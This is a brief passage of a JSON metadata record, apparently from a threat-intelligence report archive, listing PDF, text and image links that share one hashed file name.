		"pdf": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.pdf",
		"text": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.txt",
		"img": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.jpg"
	}
}